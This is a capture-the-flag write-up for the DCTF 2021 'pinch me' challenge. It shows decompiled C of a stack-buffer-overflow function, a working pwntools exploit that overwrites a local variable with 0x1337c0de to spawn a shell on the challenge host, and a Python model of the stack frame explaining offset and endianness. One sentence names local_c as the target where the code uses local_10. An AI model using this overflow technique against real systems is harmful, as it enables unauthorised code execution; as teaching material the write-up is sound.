Tags: pwn 



We got a binary file which asked us ```Am I dreaming?``` and, given basic input, then printed ```Pinch me!```.


Loading the binary into *Ghidra*, we can see that the interaction happens in the function ```vuln```:

```c
void vuln(void)
{
  char local_28 [24];
  int local_10;
  int local_c;

  local_c = 0x1234567;
  local_10 = -0x76543211;
  puts("Is this a real life, or is it just a fanta sea?");
  puts("Am I dreaming?");
  /* the call that reads user input into local_28 is not shown in this excerpt */
  if (local_10 == 0x1337c0de) {
    /* body not shown in this excerpt; this is the branch the writeup uses to get a shell */
  }
  else {
    if (local_c == 0x1234567) {
      puts("Pinch me!");
    }
    else {
      puts("Pinch me harder!");
    }
  }
  return;
}
```

Based on this, overwriting the local_c variable with ```0x1337c0de``` gives me a shell.

This was pretty easy, I only needed to be careful to use the correct endianness.
Pwntools provides ```p64``` to pack the value in the right byte order.

My final exploit was:

```python
#!/usr/bin/env python3
from pwn import *

context.arch = 'amd64'
#context.log_level = "DEBUG"
context.log_level = "INFO"

context.terminal = ['xfce4-terminal', '-x', 'sh', '-c']

vulnerable = './pinch_me'

#p = process( vulnerable )
p = remote("dctf1-chall-pinch-me.westeurope.azurecontainer.io", 7480)

# wait for the prompt before sending anything
p.readuntil(b'Am I dreaming?')

# 24 bytes fill local_28, the next 8 bytes land on local_10/local_c;
# p64() packs 0x1337c0de little-endian so local_10 receives it
p.sendline(b'\x41'*24 + p64(0x1337c0de))

#p.readuntil('will this work')
p.read( 2048, timeout=1 ) # cleanup output

# hand the shell over to the terminal
p.interactive()
```
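To make the offset and endianness points concrete, here is an added model of ```vuln```'s stack frame (not code from the original writeup). It uses ```struct``` instead of pwntools' ```p64```, derives the 24-byte offset from Ghidra's ```local_28```/```local_10```/```local_c``` names, and assumes the binary copies the input into ```local_28``` without a bounds check; the second payload uses the wrong byte order to show why that matters.

```python
import struct

# Ghidra names locals by their offset from rbp: local_28 at rbp-0x28, local_10 at
# rbp-0x10, local_c at rbp-0xc.  The buffer is therefore 0x28-0x10 = 24 bytes long
# and is followed directly by local_10 and then local_c (32-bit ints each).
BUF_SIZE = 0x28 - 0x10
SHELL_MAGIC = 0x1337c0de   # value vuln() compares local_10 against
PINCH_MAGIC = 0x1234567    # initial value of local_c

def frame_after_write(payload: bytes) -> dict:
    """Model the frame after `payload` is copied into local_28 with no length check.

    Assumption: the read is unbounded (as the writeup's overflow implies).  Bytes
    beyond the modelled frame are dropped here; on the real stack they would hit
    the saved registers instead.
    """
    frame = bytearray(BUF_SIZE + 8)
    struct.pack_into('<i', frame, BUF_SIZE, -0x76543211)      # local_10 initial value
    struct.pack_into('<I', frame, BUF_SIZE + 4, PINCH_MAGIC)  # local_c initial value
    n = min(len(payload), len(frame))
    frame[:n] = payload[:n]
    local_10, local_c = struct.unpack_from('<II', frame, BUF_SIZE)
    return {'local_10': local_10, 'local_c': local_c}

def vuln_branch(payload: bytes) -> str:
    """Return which branch of vuln() the input would reach."""
    f = frame_after_write(payload)
    if f['local_10'] == SHELL_MAGIC:
        return 'shell'
    if f['local_c'] == PINCH_MAGIC:
        return 'Pinch me!'
    return 'Pinch me harder!'

# Constructed payloads: the writeup's (little-endian, what p64() emits) and a
# big-endian variant that puts the magic bytes in the wrong place.
good = b'A' * BUF_SIZE + struct.pack('<Q', SHELL_MAGIC)
wrong = b'A' * BUF_SIZE + struct.pack('>Q', SHELL_MAGIC)

if __name__ == '__main__':
    for name, payload in (('benign', b'hi\n'), ('good', good), ('wrong', wrong)):
        print(name, frame_after_write(payload), '->', vuln_branch(payload))
```

With the little-endian payload ```local_10``` becomes ```0x1337c0de``` and ```local_c``` becomes 0; with the big-endian one ```local_10``` stays 0 and ```local_c``` gets ```0xdec03713```, so neither check passes.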

Then I just needed to print the file ```flag.txt```.

The flag was:


Original writeup (https://w0y.at/writeup/2021/05/17/dctf-2021-pinch-me.html).